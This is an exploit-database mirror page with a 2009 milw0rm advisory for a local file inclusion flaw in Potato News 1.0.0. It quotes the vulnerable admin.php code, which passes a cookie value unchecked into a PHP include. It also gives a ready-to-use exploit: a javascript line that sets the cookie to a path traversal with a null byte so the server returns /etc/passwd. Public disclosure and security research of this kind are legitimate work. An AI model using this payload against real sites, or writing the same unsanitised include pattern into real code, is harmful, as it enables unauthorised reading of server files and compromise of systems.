bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8032.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

#########################################################################################
[0x01] Informations:
Name : Potato News 1.0.0
Download :
http://potato-news.googlecode.com/files/potatonews-1.0.0.zip
Vulnerability : LFI
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/admin.php
[Code]
<?PHP
if (isset($_COOKIE["user"])) {
$id = $_COOKIE["user"];
if (file_exists("data/users/$id.php")) {
include ("data/users/$id.php");
if ($usaavatar == "") {
echo "<img height='75px' width='75px' src='images/noav.jpg'/>";
} else {
echo "<img height='75px' width='75px' src='$usaavatar'/>";
}
}
[/code]
#########################################################################################
[0x03] Exploit:
Exploit: javascript:document.cookie =
"user=../../../../../../../../../../etc/passwd%00; path=/"
########################################################################################
# milw0rm.com [2009-02-10]
Reference in a new issue View git blame Copy permalink